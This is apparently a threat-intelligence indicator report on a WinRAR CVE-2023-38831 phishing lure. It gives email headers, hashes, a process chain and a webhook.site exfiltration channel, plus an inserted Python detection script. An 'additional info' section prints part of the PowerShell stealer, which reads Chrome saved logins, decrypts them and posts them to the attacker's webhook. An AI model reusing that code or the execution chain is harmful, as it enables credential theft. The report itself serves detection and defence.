VRad

#rar_explot_300823

Sep 4th, 2023 (edited)
#IOC #OptiData #VR #RAR #202338831 #CMD #Powershell

https://pastebin.com/APaRNDHd

previous_contact:
n/a

FAQ:
https://isc.sans.edu/diary/Analysis+of+RAR+Exploit+Files+CVE202338831/30164/


attack_vector
--------------
email attach .RAR (exploit) > .xlsx .cmd > a.ps1 > powershell > exfil


# # # # # # # #
email_headers
# # # # # # # #
Return-Path: <management@abcosteel.com>
Received: from server.abcosteel.com (server.abcosteel.com [108.175.163.195])
Received: from [185.195.19.200] (port=44932 helo=[127.0.1.1]) by server.abcosteel.com with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.93)
From: cyber_alerts <management@abcosteel.com>
Subject: Нові індикатори кіберзагроз
Message-Id: <20230830131505.37UDF5QT031908@abcosteel.com>
Date: Wed, 30 Aug 2023 13:15:05 +0300


# # # # # # # #
files
# # # # # # # #
SHA-256 f5b5148acf4bc340b316f527c4a378f9ba51d06abe3062dcbc62bcd9954d86c9
File name IOC_30_08.rar [ WinRAR CVE-2023-38831 ]
File size 13.71 KB (14044 bytes)

SHA-256 ce406bd003cbb998988a51b75b2c55b45a0e818924f6adaa783d9077375db1dc
File name IOC_30_08.xlsx .cmd
File size 23.79 KB (24363 bytes)

SHA-256 363039a76125c64bf01a6694f8a3b806a832df68b442a0ce4ad76cf565678648
File name a.ps1
File size 18.96 KB (19418 bytes)


# # # # # # # #
activity
# # # # # # # #
PL_SCR email_attach

C2 http://webhook.site/e6c23321-fea1-4aec-ab1a-cc5e9b93b8c6


netwrk
--------------
46.4.105{ .116 webhook{ .site 80 HTTP POST /e6c23321-fea1-4aec-ab1a-cc5e9b93b8c6 HTTP/1.1 Mozilla/5.0 (Windows NT; Windows NT 6.1; uk-UA) WindowsPowerShell/5.1.14409.1005
46.4.105{ .116 webhook{ .site 80 HTTP POST /e6c23321-fea1-4aec-ab1a-cc5e9b93b8c6 HTTP/1.1 Mozilla/5.0 (Windows NT; Windows NT 6.1; uk-UA) WindowsPowerShell/5.1.14409.1005


comp
--------------
powershell.exe 46.4.105{ .116 80


proc
--------------
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\operator\Desktop\IOC_30_08.rar"
C:\Windows\system32\cmd.exe /c ""C:\tmp\Rar$DIa948.23332\IOC_30_08.xlsx .cmd" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-ExecutionPolicy Unrestricted -scope CurrentUser; .\a.ps1
"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe del .\a.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -encodedCommand "QQBkAGQALQBUAHkAc
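The proc and netwrk lines above are the observable chain of the CVE-2023-38831 abuse: WinRAR extracts into a Rar$<id> temp directory and launches a file named "<doc>.xlsx .cmd" (space before the real extension), which starts PowerShell with an execution-policy change and later a hidden encoded command that POSTs to webhook.site with a WindowsPowerShell user agent. The following detection script is an added example, not part of this paste and not the analyst's own tooling; the process and HTTP event dictionaries, their field names (image, parent, cmdline, host, method, user_agent) and the tag names are constructed here for illustration, with command lines copied from the proc and netwrk sections.

```python
import ntpath
import re
from typing import Dict, List

# WinRAR's viewer extracts to a temp dir named Rar$<letters><digits>.<digits>.
RAR_TEMP_DIR = re.compile(r"Rar\$[A-Za-z]+\d+\.\d+")
# Spoofed double extension "<name>.xlsx .cmd": a document extension, whitespace,
# then a script/executable extension. This is the CVE-2023-38831 file-name shape.
DOUBLE_EXT = re.compile(
    r"\.(xlsx|xls|docx|doc|pdf|jpg|png|txt)\s+\.(cmd|bat|exe|ps1|vbs|js)\b", re.I)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath so it works on any host)."""
    return ntpath.basename(path.strip('"')).lower()


def classify_process(ev: Dict[str, str]) -> List[str]:
    """Return detection tags for one process-creation event (empty list = benign)."""
    tags: List[str] = []
    image, parent, cmd = _base(ev["image"]), _base(ev.get("parent", "")), ev["cmdline"]
    low = cmd.lower()
    if parent == "winrar.exe" and image in SHELLS:
        tags.append("winrar_spawned_shell")
    if RAR_TEMP_DIR.search(cmd) and DOUBLE_EXT.search(cmd):
        tags.append("rar_temp_double_extension")
    if image in POWERSHELL:
        if "set-executionpolicy" in low and ("unrestricted" in low or "bypass" in low):
            tags.append("ps_execution_policy_change")
        if re.search(r"-w(?:indowstyle)?\s+hidden", low) and \
           re.search(r"-e(?:c|nc|ncodedcommand)?\s+\S", low):
            tags.append("ps_hidden_encoded")
    return tags


def classify_http(ev: Dict[str, str]) -> List[str]:
    """Return detection tags for one outbound HTTP request record."""
    tags: List[str] = []
    if "windowspowershell" in ev.get("user_agent", "").lower() and ev.get("method") == "POST":
        tags.append("powershell_http_post")
    if ev.get("host", "").lower().endswith("webhook.site"):
        tags.append("webhook_site_exfil_channel")
    return tags


def scan_processes(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify_process over a list of events; keep only the flagged ones."""
    hits = []
    for i, ev in enumerate(events):
        tags = classify_process(ev)
        if tags:
            hits.append({"index": i, "image": _base(ev["image"]), "tags": tags})
    return hits


# Constructed sample events modeled on the proc section (parent paths are assumed).
WINRAR = r"C:\Program Files\WinRAR\WinRAR.exe"
CMD = r"C:\Windows\system32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_PROCESS_EVENTS = [
    {"image": WINRAR, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\operator\Desktop\IOC_30_08.rar"'},
    {"image": CMD, "parent": WINRAR,
     "cmdline": r'C:\Windows\system32\cmd.exe /c ""C:\tmp\Rar$DIa948.23332\IOC_30_08.xlsx .cmd" "'},
    {"image": PS, "parent": CMD,
     "cmdline": PS + r" Set-ExecutionPolicy Unrestricted -scope CurrentUser; .\a.ps1"},
    {"image": r"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE", "parent": CMD,
     "cmdline": r'"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e'},
    # The encoded payload is the truncated value shown in the paste, not the full command.
    {"image": PS, "parent": PS,
     "cmdline": PS + ' -windowstyle hidden -encodedCommand "QQBkAGQALQBUAHkAc'},
    # Benign control: interactive PowerShell started from Explorer.
    {"image": PS, "parent": r"C:\Windows\explorer.exe", "cmdline": PS + " Get-Process"},
]

# Constructed HTTP record modeled on the netwrk line.
SAMPLE_HTTP_EVENT = {
    "host": "webhook.site", "method": "POST",
    "path": "/e6c23321-fea1-4aec-ab1a-cc5e9b93b8c6",
    "user_agent": "Mozilla/5.0 (Windows NT; Windows NT 6.1; uk-UA) WindowsPowerShell/5.1.14409.1005",
}

if __name__ == "__main__":
    for hit in scan_processes(SAMPLE_PROCESS_EVENTS):
        print(hit)
    print(classify_http(SAMPLE_HTTP_EVENT))
```

The double-extension regex is deliberately tied to the Rar$ temp directory so that an ordinary "report.xlsx .cmd" on a desktop is not enough on its own; the execution-policy and hidden/encoded checks are generic PowerShell tells and will fire on legitimate admin scripts too, so they are better treated as enrichment on the WinRAR-parent hit than as stand-alone alerts.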


persist
--------------
n/a


drop
--------------
%temp%\Rar$DIa948.23332\IOC_30_08.xlsx .cmd
%temp%\example.xlsx
C:\Users\%name%\Desktop\a.ps1
C:\Users\%name%\AppData\Roaming\Microsoft\Office\Последние файлы\example.xlsx.LNK


# # # # # # # #
additional info
# # # # # # # #
Add-Type -AssemblyName System.Text.Encoding; Add-Type -AssemblyName System.Security; $hook="http://webhook.site/e6c23321-fea1-4aec-ab1a-cc5e9b93b8c6"; $dataPath="$($env:LOCALAPPDATA)\\Google\\Chrome\\User Data\\Default\\Login Data"; $localStatePath = "$($env:LOCALAPPDATA)\\Google\\Chrome\\User Data\\Local State"; ....
:Unprotect($master_key_encoded[5..$master_key_encoded.length], $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $loginDataContent = [convert]::ToBase64String((Get-Content -path $dataPath -Encoding byte)); $postParams = @{k


# # # # # # # #
VT & Intezer
# # # # # # # #
https://www.virustotal.com/gui/file/f5b5148acf4bc340b316f527c4a378f9ba51d06abe3062dcbc62bcd9954d86c9/details
https://www.virustotal.com/gui/file/ce406bd003cbb998988a51b75b2c55b45a0e818924f6adaa783d9077375db1dc/details
https://analyze.intezer.com/analyses/a3975e5f-16b9-4942-b68d-bbb12fde9003/genetic-analysis
https://www.virustotal.com/gui/file/363039a76125c64bf01a6694f8a3b806a832df68b442a0ce4ad76cf565678648/details

VR